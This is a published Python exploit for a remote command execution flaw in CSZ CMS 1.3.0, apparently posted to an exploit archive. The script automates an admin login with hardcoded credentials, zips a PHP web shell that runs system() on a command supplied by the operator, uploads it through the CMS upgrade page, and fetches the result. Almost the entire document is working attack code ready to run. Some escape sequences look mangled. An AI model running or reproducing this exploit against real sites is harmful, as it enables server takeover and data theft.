Authored by tmrswrr

CSZ CMS version 1.3.0 suffers from a remote command execution vulnerability. Exploit written in Python.

# Exploit Title: CSZ CMS Version 1.3.0 Remote Command Execution
# Date: 17/11/2023
# Exploit Author: tmrswrr
# Vendor Homepage: https://www.cszcms.com/
# Software Link: https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download
# Version: Version 1.3.0
# Tested on: https://www.softaculous.com/apps/cms/CSZ_CMS


import os
import zipfile
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.firefox.options import Options as FirefoxOptions
from selenium.webdriver.firefox.service import Service as FirefoxService
from webdriver_manager.firefox import GeckoDriverManager
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.common.exceptions import NoSuchElementException, TimeoutException
import requests
from time import sleep
import sys
import random
import time
import platform
import tarfile
from io import BytesIO

email = "[email protected]" 
password = "password"

class colors:
    OKBLUE = '33[94m'
    WARNING = '33[93m'
    FAIL = '33[91m'
    ENDC = '33[0m'
    BOLD = '33[1m'
    UNDERLINE = '33[4m'
    CBLACK = '33[30m'
    CRED = '33[31m'
    CGREEN = '33[32m'
    CYELLOW = '33[33m'
    CBLUE = '33[34m'
    CVIOLET = '33[35m'
    CBEIGE = '33[36m'
    CWHITE = '33[37m'


color_random = [colors.CBLUE, colors.CVIOLET, colors.CWHITE, colors.OKBLUE, colors.CGREEN, colors.WARNING,
                colors.CRED, colors.CBEIGE]
random.shuffle(color_random)


def entryy():
    x = color_random[0] + """

╭━━━┳━━━┳━━━━╮╭━━━┳━╮╭━┳━━━╮╭━━━┳━━━┳━━━╮╭━━━┳━╮╭━┳━━━┳╮╱╱╭━━━┳━━┳━━━━╮
┃╭━╮┃╭━╮┣━━╮━┃┃╭━╮┃┃╰╯┃┃╭━╮┃┃╭━╮┃╭━╮┃╭━━╯┃╭━━┻╮╰╯╭┫╭━╮┃┃╱╱┃╭━╮┣┫┣┫╭╮╭╮┃
┃┃╱╰┫╰━━╮╱╭╯╭╯┃┃╱╰┫╭╮╭╮┃╰━━╮┃╰━╯┃┃╱╰┫╰━━╮┃╰━━╮╰╮╭╯┃╰━╯┃┃╱╱┃┃╱┃┃┃┃╰╯┃┃╰╯
┃┃╱╭╋━━╮┃╭╯╭╯╱┃┃╱╭┫┃┃┃┃┣━━╮┃┃╭╮╭┫┃╱╭┫╭━━╯┃╭━━╯╭╯╰╮┃╭━━┫┃╱╭┫┃╱┃┃┃┃╱╱┃┃
┃╰━╯┃╰━╯┣╯━╰━╮┃╰━╯┃┃┃┃┃┃╰━╯┃┃┃┃╰┫╰━╯┃╰━━╮┃╰━━┳╯╭╮╰┫┃╱╱┃╰━╯┃╰━╯┣┫┣╮╱┃┃
╰━━━┻━━━┻━━━━╯╰━━━┻╯╰╯╰┻━━━╯╰╯╰━┻━━━┻━━━╯╰━━━┻━╯╰━┻╯╱╱╰━━━┻━━━┻━━╯╱╰╯

                <<   CSZ CMS Version 1.3.0 RCE     >>
                <<      CODED BY TMRSWRR           >>
                <<     GITHUB==>capture0x          >>

n"""
    for c in x:
        print(c, end='')
        sys.stdout.flush()
        sleep(0.0045)
    oo = " " * 6 + 29 * "░⣿" + "nn"
    for c in oo:
        print(colors.CGREEN + c, end='')
        sys.stdout.flush()
        sleep(0.0065)

    tt = " " * 5 + "░⣿" + " " * 6 + "WELCOME TO CSZ CMS Version 1.3.0 RCE Exploit" + " " * 7 + "░⣿" + "nn"
    for c in tt:
        print(colors.CWHITE + c, end='')
        sys.stdout.flush()
        sleep(0.0065)
    xx = " " * 6 + 29 * "░⣿" + "nn"
    for c in xx:
        print(colors.CGREEN + c, end='')
        sys.stdout.flush()
        sleep(0.0065)

def check_geckodriver():
    current_directory = os.path.dirname(os.path.abspath(__file__))
    geckodriver_path = os.path.join(current_directory, 'geckodriver')

    if not os.path.isfile(geckodriver_path):
        red = "33[91m"
        reset = "33[0m"
        print(red + "nnGeckoDriver (geckodriver) is not available in the script's directory." + reset)
        user_input = input("Would you like to download it now? (yes/no): ").lower()
        if user_input == 'yes':
            download_geckodriver(current_directory)
        else:
            print(red + "Please download GeckoDriver manually from: https://github.com/mozilla/geckodriver/releases" + reset)
            sys.exit(1)

def download_geckodriver(directory):

    print("[*] Detecting OS and architecture...")
    os_name = platform.system().lower()
    arch, _ = platform.architecture()

    if os_name == "linux":
        os_name = "linux"
        arch = "64" if arch == "64bit" else "32"
    elif os_name == "darwin":
        os_name = "macos"
        arch = "aarch64" if platform.processor() == "arm" else ""
    elif os_name == "windows":
        os_name = "win"
        arch = "64" if arch == "64bit" else "32"
    else:
        print("[!] Unsupported operating system.")
        sys.exit(1)

    geckodriver_version = "v0.33.0"
    geckodriver_file = f"geckodriver-{geckodriver_version}-{os_name}{arch}"
    ext = "zip" if os_name == "win" else "tar.gz"
    url = f"https://github.com/mozilla/geckodriver/releases/download/{geckodriver_version}/{geckodriver_file}.{ext}"

    print(f"[*] Downloading GeckoDriver for {platform.system()} {arch}-bit...")
    response = requests.get(url, stream=True)

    if response.status_code == 200:
        print("[*] Extracting GeckoDriver...")
        if ext == "tar.gz":
            with tarfile.open(fileobj=BytesIO(response.content), mode="r:gz") as tar:
                tar.extractall(path=directory)
        else:   
            with zipfile.ZipFile(BytesIO(response.content)) as zip_ref:
                zip_ref.extractall(directory)
        print("[+] GeckoDriver downloaded and extracted successfully.")
    else:
        print("[!] Failed to download GeckoDriver.")
        sys.exit(1)
        
def create_zip_file(php_filename, zip_filename, php_code):
    try:
        with open(php_filename, 'w') as file:
            file.write(php_code)
        with zipfile.ZipFile(zip_filename, 'w') as zipf:
            zipf.write(php_filename)
        print("[+] Zip file created successfully.")
        os.remove(php_filename)
        return zip_filename
    except Exception as e:
        print(f"[!] Error creating zip file: {e}")
        sys.exit(1)


def main(base_url, command):

    if not base_url.endswith('/'):
        base_url += '/'
        
    zip_filename = None   

    check_geckodriver()
    try:
        firefox_options = FirefoxOptions()
        firefox_options.add_argument("--headless")

        script_directory = os.path.dirname(os.path.abspath(__file__))
        geckodriver_path = os.path.join(script_directory, 'geckodriver')
        service = FirefoxService(executable_path=geckodriver_path)
        driver = webdriver.Firefox(service=service, options=firefox_options)
        print("[*] Exploit initiated.")

        # Login
        driver.get(base_url + "admin/login")
        print("[*] Accessing login page...")
        driver.find_element(By.NAME, "email").send_keys(f"{email}")
        driver.find_element(By.NAME, "password").send_keys(f"{password}")
        driver.find_element(By.ID, "login_submit").click()
        print("[*] Credentials submitted...")

 
        try:
            error_message = driver.find_element(By.XPATH, "//*[contains(text(), 'Email address/Password is incorrect')]")
            if error_message.is_displayed():
                print("[!] Login failed: Invalid credentials.")
                driver.quit()
                sys.exit(1)
        except NoSuchElementException:
            print("[+] Login successful.")

        # File creation  
        print("[*] Preparing exploit files...")
        php_code = f"<?php echo system('{command}'); ?>"
        zip_filename = create_zip_file("exploit.php", "payload.zip", php_code)

 
        driver.get(base_url + "admin/upgrade")
        print("[*] Uploading exploit payload...")
        file_input = driver.find_element(By.ID, "file_upload")
        file_input.send_keys(os.path.join(os.getcwd(), zip_filename))

    # Uploading
        driver.find_element(By.ID, "submit").click()
        WebDriverWait(driver, 10).until(EC.alert_is_present())
        alert = driver.switch_to.alert
        alert.accept()

        # Exploit result 
        exploit_url = base_url + "exploit.php"
        response = requests.get(exploit_url)
        print(f"[+] Exploit response:nn{response.text}")

    except Exception as e:
        print(f"[!] Error: {e}")
    finally:
        driver.quit()
        if zip_filename and os.path.exists(zip_filename):
            os.remove(zip_filename)

if __name__ == "__main__":
    entryy()
    if len(sys.argv) < 3:
        print("Usage: python script.py [BASE_URL] [COMMAND]")
    else:
        main(sys.argv[1], sys.argv[2])

RELATED ARTICLESMORE FROM AUTHOR